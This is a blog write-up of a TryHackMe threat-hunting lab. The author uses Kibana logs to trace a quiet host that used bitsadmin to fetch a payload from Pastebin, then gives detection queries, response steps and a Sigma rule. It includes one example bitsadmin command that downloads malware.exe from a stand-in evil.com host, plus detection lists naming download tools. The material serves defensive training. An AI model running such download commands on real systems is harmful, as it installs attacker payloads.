All writeupsField notes / TryHackMe

TryHackMe ItsyBitsy: When 0.4% of Traffic is 100% Malicious

The investigation

Found a compromised machine by doing the opposite of what I thought was right. The suspicious IP had only 2 events out of 1,482. Sometimes the quietest connection is the loudest alarm.

Found a compromised machine by doing the opposite of what I thought was right. The suspicious IP had only 2 events out of 1,482. Sometimes the quietest connection is the loudest alarm.

The Setup

IDS alert: Possible C2 communication from the HR department.

What I had:

  • ELK Stack (Elasticsearch + Kibana)
  • March 2022 logs
  • 1,482 events total
  • No idea which user was compromised

Access: http://MACHINE_IP — Login: elastic/elastic

The Wrong Assumption That Almost Got Me

I opened Kibana, clicked on source_ip field, and saw this:

192.166.65.52: 1,480 events (99.6%)
192.166.65.54: 2 events (0.4%)

My first instinct: "Obviously the IP with 1,480 connections is the problem."

I was completely wrong.

Why Volume ≠ Suspicion

Here's what the high-volume IP (192.166.65.52) was doing:

  • Normal web browsing
  • Multiple different destinations
  • Standard Mozilla user agent
  • Typical office worker behavior

Here's what the low-volume IP (192.166.65.54) was doing:

  • Only 2 connections
  • Both to the same destination
  • User agent: bitsadmin
  • This is our guy

Key lesson: Attackers try to be quiet. They don't want to show up in your top 10 talkers list.

What the Hell is BITSAdmin?

When I saw the user agent bitsadmin, I had to look it up.

BITSAdmin = Background Intelligent Transfer Service Administration

It's a legitimate Windows tool for:

  • Managing download/upload jobs
  • Windows Update uses it
  • Transferring files in the background

Why attackers love it:

  • Pre-installed on every Windows machine
  • Signed by Microsoft
  • Often whitelisted by security tools
  • Can download files from the internet
  • It's a Living-off-the-Land Binary (LOLBin)

Command-line example:

bitsadmin /transfer myDownloadJob /download /priority normal http://evil.com/malware.exe C:\temp\malware.exe

Normal users don't use BITSAdmin. If you see it in your logs, investigate immediately.

Finding the C2 Server

I filtered for the suspicious IP:

source_ip: 192.166.65.54

Looking at the host field, I found: pastebin.com

Wait, Pastebin? The text-sharing site?

Why Pastebin Makes Perfect C2

Attackers use legitimate services as C2 infrastructure because:

Pros for attackers:

  • Free and anonymous
  • HTTPS by default (encrypted)
  • Hard to block without breaking legitimate business
  • Blends with normal traffic
  • No infrastructure to maintain

Cons for defenders:

  • Can't just block Pastebin (users need it)
  • Looks like normal web traffic
  • No obvious malicious indicators

Other services commonly abused:

  • GitHub Gists
  • Google Drive
  • Dropbox
  • Discord
  • Telegram

The Full Attack Chain

Step 1: Initial Compromise User machine gets infected (method unknown from these logs)

Step 2: Tool Transfer Attacker uses BITSAdmin to download malware:

Source: 192.166.65.54
Destination: pastebin.com/yTg0Ah6a
User Agent: bitsadmin

Step 3: C2 Communication Malware connects back to Pastebin for commands/data

Full URL: https://pastebin.com/yTg0Ah6a

When I visited the URL (in a VM, not on my real machine!), I found the malicious payload with the flag.

What I Learned

1. Low Frequency = High Suspicion

In a dataset of 1,482 events:

  • 1,480 events from one IP = probably normal
  • 2 events from another IP = investigate this first

Why?

  • Attackers minimize their footprint
  • C2 beacons are often low-volume
  • Malware downloads happen once, then go quiet

Detection strategy:

Look for:
- Unusual user agents (bitsadmin, certutil, curl, wget)
- Single connections to file-sharing sites
- Non-browser traffic to web services

2. User Agent Analysis is Critical

Normal traffic user agents:

Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Chrome/98.0.4758.102...

Suspicious user agents:

bitsadmin
certutil
python-requests/2.25.1
curl/7.68.0

Kibana query:

user_agent: (bitsadmin OR certutil OR curl OR wget OR python-requests)

3. Context Beats Signatures

A connection to Pastebin isn't inherently malicious, but:

  • From an HR user +
  • Using BITSAdmin +
  • Only 2 connections +
  • After an IDS alert

= High confidence compromise

The Quick Win Queries

Find low-frequency IPs:

In Kibana: Click source_ip field → Sort by count ascending

Find suspicious user agents:

user_agent: *bitsadmin* OR user_agent: *certutil*

Find file-sharing site access:

host: *pastebin.com* OR host: *paste.ee* OR host: *controlc.com*

Combine them:

source_ip: 192.166.65.54 AND user_agent: *bitsadmin*

Real-World Response

If I found this in production:

Immediate (5 minutes):

  1. Isolate the infected machine (192.166.65.54)
  2. Block pastebin.com/yTg0Ah6a at the firewall
  3. Disable the compromised user account

Investigation (1 hour):

  1. Check what else this IP contacted
  2. Search for other machines using BITSAdmin
  3. Review recent downloads to this machine
  4. Check for lateral movement attempts

Hunting queries:

# Find other BITSAdmin usage
user_agent: *bitsadmin*
# Find other Pastebin connections
host: *pastebin.com*
# Find unusual user agents
user_agent: * AND NOT user_agent: *Mozilla* AND NOT user_agent: *Chrome*

Long-term fixes:

  • Monitor LOLBin usage (BITSAdmin, Certutil, etc.)
  • Implement application whitelisting
  • Require proxy authentication for external sites
  • Enable command-line logging on all endpoints

MITRE ATT&CK Mapping

This attack maps to:

T1105 — Ingress Tool Transfer Using BITSAdmin to download payload

T1071.001 — Application Layer Protocol: Web Protocols HTTPS C2 communication

T1567.002 — Exfiltration to Code Repository Using Pastebin as C2

T1218 — System Binary Proxy Execution Abusing legitimate Windows binary (BITSAdmin)

Final Thoughts

This room taught me to trust the anomalies, not the volume.

When I first saw the stats:

  • 99.6% of traffic from one IP
  • 0.4% of traffic from another IP

My instinct said "investigate the 99.6%." The data said "investigate the 0.4%."

The data was right.

In SOC work, you're looking for needles in haystacks. Sometimes the smallest needle is the sharpest.

Detection Rule for Your SIEM

Here's a Sigma rule for detecting this:

title: LOLBin Network Activity Detection
status: experimental
description: Detects network connections from LOLBins
references:
    - https://lolbas-project.github.io/
logsource:
    category: proxy
detection:
    selection:
        c-useragent:
            - '*bitsadmin*'
            - '*certutil*'
            - '*curl*'
            - '*wget*'
    condition: selection
falsepositives:
    - Legitimate administrative activity
level: high

Related posts:

  • Benign: The Imposter Account That Almost Fooled Me
  • CVE-2024–42327: Real Zabbix SQL Injection

Tags: #TryHackMe #ELK #Kibana #LOLBins #C2Detection #SOC #ThreatHunting

Questions? Found a better approach? Drop a comment.

End of field noteBack to the archive